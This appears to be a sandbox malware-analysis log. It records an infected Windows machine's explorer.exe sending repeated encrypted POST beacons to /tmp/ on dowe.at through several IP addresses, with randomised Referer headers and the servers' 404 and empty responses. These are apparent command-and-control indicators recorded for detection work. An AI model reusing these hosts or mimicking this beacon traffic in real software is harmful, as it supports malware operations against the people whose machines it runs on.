                                                            Host: dowe.at
                                                            Nov 30, 2022 00:10:58.231524944 CET282OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 64 43 a2 e8
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA .[k,vudCN!hlRQ}mq!6h(yh4:gCxT3Z?nH&U>Y :aNqqlCv84Gum1.yC;:O!
                                                            Nov 30, 2022 00:10:59.088948011 CET283INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:10:58 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 8
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 04 00 00 00 72 e8 87 ee
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            10192.168.2.649731211.59.14.9080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:25.986078978 CET4275OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://dkguxo.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 305
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:25.987418890 CET4276OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 57 33 ac f2
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vuW3_ZotrVL1bMf(){\G\lH&A;.<ADb-}<f"[drbf]~\}.Fp+'N/
                                                            Nov 30, 2022 00:11:27.160924911 CET4276INHTTP/1.1 200 OK
                                                            Date: Tue, 29 Nov 2022 23:11:26 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 0
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            11192.168.2.649732211.59.14.9080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:27.552278996 CET4277OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://frdxrq.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 168
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:27.552583933 CET4277OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 7a 1c fd af
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vuz{p.e^meKI,iW3-x#C#b1T
                                                            Nov 30, 2022 00:11:28.751085997 CET4278INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:11:28 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 331
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            12192.168.2.649733211.59.14.9080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:33.288846970 CET4279OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://plraoc.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 351
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:33.292745113 CET4279OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 59 1a c6 a0
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vuYiBtWBq0uz>JKH8sdP5q**W4KfGAYLfiql6(UeZvB<^mF
                                                            Nov 30, 2022 00:11:34.508234978 CET4280INHTTP/1.1 200 OK
                                                            Date: Tue, 29 Nov 2022 23:11:33 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 0
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            13192.168.2.649734211.59.14.9080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:34.842155933 CET4287OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://panajd.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 205
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:34.842196941 CET4288OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 58 31 b9 a9
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vuX1pdvU G(s#l$;BG[54XZ?%Ow!T6b\fx)9yevW2
                                                            Nov 30, 2022 00:11:35.781203032 CET4288INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:11:35 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 331
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            14192.168.2.649736211.59.14.9080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:36.131793022 CET4289OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://queeh.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 150
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:36.131817102 CET4290OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 29 18 eb ac
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vu)wAh^~Y)8X0*G ]O$*=tc#;v
                                                            Nov 30, 2022 00:11:37.042538881 CET4290INHTTP/1.1 200 OK
                                                            Date: Tue, 29 Nov 2022 23:11:36 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 0
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            15192.168.2.649737200.46.66.7180C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:37.256628990 CET4291OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://lvqyks.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 344
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:37.256666899 CET4291OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 27 0b f3 b8
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vu'}p{`Ku,Y]^M[G-Q0w+Y4uM2/d"#r'\?,5;D!^GX.7nGEJ1]F*^~
                                                            Nov 30, 2022 00:11:38.125377893 CET4292INHTTP/1.1 200 OK
                                                            Date: Tue, 29 Nov 2022 23:11:37 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 0
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            16192.168.2.649738201.124.230.180C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:38.392638922 CET4293OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://oidcj.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 321
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:38.392664909 CET4293OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 2b 3d e9 e1
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vu+=yrojy<[$Bz@tDcJ9.=S%otR54yM-Ly!3lkm6+ZWsVry~q2
                                                            Nov 30, 2022 00:11:39.118047953 CET4293INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:11:38 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 50
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 1f 62 43 e4 37 01 fe ef 46 ea d0 ec a6 6d 81 3e d9 f7 22 5e 5a 85 84 8b cb 7c 9a 2e 1d 03
                                                            Data Ascii: #\6bC7Fm>"^Z|.


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            17192.168.2.649740200.46.66.7180C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:40.905594110 CET4783OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://ljwdjes.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 118
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:40.905594110 CET4783OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 06 6b 2c 90 f4 76 0b 75 2a 3d b6 8d
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA ,[k,vu*=QiQDQ)9dVB[
                                                            Nov 30, 2022 00:11:41.773041964 CET4784INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:11:41 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 331
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            18192.168.2.649741200.46.66.7180C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:42.015697002 CET4785OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://bajxyhac.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 160
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:42.015731096 CET4785OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 5c 17 f1 f3
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vu\NMk_]\>2g8wcn7ty:+Z%*B@4PI!E
                                                            Nov 30, 2022 00:11:42.917011976 CET4786INHTTP/1.1 200 OK
                                                            Date: Tue, 29 Nov 2022 23:11:42 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 0
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Nov 30, 2022 00:11:43.467472076 CET4787INHTTP/1.1 200 OK
                                                            Date: Tue, 29 Nov 2022 23:11:42 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 0
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            19192.168.2.649742211.59.14.9080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:43.262384892 CET4787OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://fbxsgv.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 343
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:43.262415886 CET4787OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 20 44 e5 ab
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vu DH&kA*LBc*].SP.THN>hqQ([.Ks3V&e[E:XJox+;pIZ<h%:.
                                                            Nov 30, 2022 00:11:44.508891106 CET4788INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:11:43 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 331
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2192.168.2.649721211.59.14.9080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:10:59.875227928 CET290OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://owxfgf.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 207
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:10:59.878920078 CET291OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 53 5a b8 9e
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vuSZzW{r]\]epapSfY9*I7*Fn(I?'uE%~[\A*+`6*#
                                                            Nov 30, 2022 00:11:01.062212944 CET291INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:11:00 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 331
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            20192.168.2.649743201.124.230.180C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:44.773011923 CET4789OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://xjvagowrnc.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 128
                                                            Host: dowe.at
